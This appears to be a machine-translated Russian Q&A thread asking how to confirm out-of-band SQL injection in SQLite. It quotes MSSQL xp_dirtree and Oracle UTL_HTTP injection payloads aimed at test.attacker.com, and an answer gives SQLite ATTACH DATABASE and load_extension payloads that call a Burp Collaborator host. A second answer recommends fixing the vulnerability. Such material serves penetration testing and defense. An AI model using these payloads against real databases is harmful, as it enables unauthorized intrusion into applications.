Внеполосные инъекции sql в sqlite3?

Question

Возможно ли иметь внеполосный впрыск SQL в базе данных sqlite3?

Я имею в виду, что если у нас есть база данных Microsoft SQL Server, мы можем использовать что-то вроде этого

https://example.com/products.aspx?id=1;EXEC master..xp_dirtree> '\ test.attacker.com \'-

и для Oracle мы можем использовать это

Выбрать * из продуктов, где> id = 1 || UTL_HTTP.request ('http://test.attacker.com/') --

В обоих вышеупомянутых случаях будет отправлен HTTP-запрос на http://test.attacker.com. Есть ли что-то похожее в sqlite3, который отправляет http-запрос для подтверждения внеполосной инъекции?

Я попытался найти его здесь, но я не вижу ничего, что можно использовать для отправки http-запросов.

https://sqlite.org/cli.html

Answer 1

Я получил ответ здесь https://youtu.be/ha6LD1-RiJU?t=901. Я попробовал оба варианта

sqlite> attach database '/net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollaborator.ne
t/z' as z;
Error: unable to open database: /net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollabor
ator.net/z

и это

sqlite> select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
.net');
Error: The specified module could not be found.

Я получил DNS-запрос в Burp Collaborator для второй полезной нагрузки, т.е.

select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
    .net');

Answer 2

У меня нет опыта, чтобы ответить на этот вопрос напрямую, но у меня есть общий совет относительно такого рода вопросов в целом.

Вы должны различить уязвимость SQL-инъекции и использовать такой уязвимости. И последнее совсем не важно.

Пока существует уязвимость, она будет эксплуатироваться , так или иначе. И не имеет большого значения, какой именно эксплойт будет использован.

Итак, с точки зрения защиты , вам совершенно не нужны различные приемы эксплойтов. Все, что вам нужно, это исправить уязвимость, и она отбросит все возможные эксплойты одновременно.